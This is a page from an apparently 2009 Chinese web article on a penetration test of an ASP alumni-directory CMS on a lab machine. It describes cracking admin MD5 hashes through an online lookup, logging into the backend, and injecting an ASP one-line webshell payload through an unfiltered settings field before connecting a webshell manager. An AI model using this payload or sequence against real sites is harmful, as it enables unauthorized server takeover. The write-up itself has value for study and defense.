WEB开发网
开发学院网络安全安全技术 不懂ASP也照样挖漏洞 记一次CMS型校友录的安全检测... 阅读

不懂ASP也照样挖漏洞 记一次CMS型校友录的安全检测

 2009-01-05 13:50:06 来源:WEB开发网   
核心提示: CMS型校友录的安全检测" onload="return imgzoom(this,550);" onclick="javascript:window.open(this.src);" style="cursor:pointer

不懂ASP也照样挖漏洞 记一次<a target=CMS型校友录的安全检测" onload="return imgzoom(this,550);" onclick="javascript:window.open(this.src);" style="cursor:pointer;"/>

图19

2.破解密码并登录后台

把d42683b3df678c61和c39059a89ab77d84拿到www.cmd5.com去解密,密码分别是admin1和admin2。拿去登录后台,成功。如图20 所示。

不懂ASP也照样挖漏洞 记一次<a target=CMS型校友录的安全检测" onload="return imgzoom(this,550);" onclick="javascript:window.open(this.src);" style="cursor:pointer;"/>

图20

这里不太明白,为什么开发者使用两个登录密码,而两个密码放在同一表里,这里对安全性并没有太大的提高。应该 把第二个密码使用其它加密方式单独写入一个asp文件中,这样安全性不是有更大的提高?

3.插入一句话后门

查看一下siteinfo.asp文件,此文件是网站的一些信息配置文件,而后台admin/siteinfo.asp 对此配置文件编辑时,并不会对表单的值进行过滤,就给攻击者在配置文件写入一句话木马的机会。在管理后台,点击 站点参数,在网址栏输入:http://"% ><%execute(request("n"))%><%',如图21所示。

不懂ASP也照样挖漏洞 记一次<a target=CMS型校友录的安全检测" onload="return imgzoom(this,550);" onclick="javascript:window.open(this.src);" style="cursor:pointer;"/>

图21

4.使用Lanker的Webshell连接后台

使用lanker微型PHP+ASP管理器1.0双用版连接http://192.168.1.4/txl/siteinfo.asp,如图22所示,成功获得 Webshell,之后可以上传大马,做进一步提权渗透测试。

不懂ASP也照样挖漏洞 记一次<a target=CMS型校友录的安全检测" onload="return imgzoom(this,550);" onclick="javascript:window.open(this.src);" style="cursor:pointer;"/>

上一页  4 5 6 7 8 9 10  下一页

Tags:ASP 照样 漏洞

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接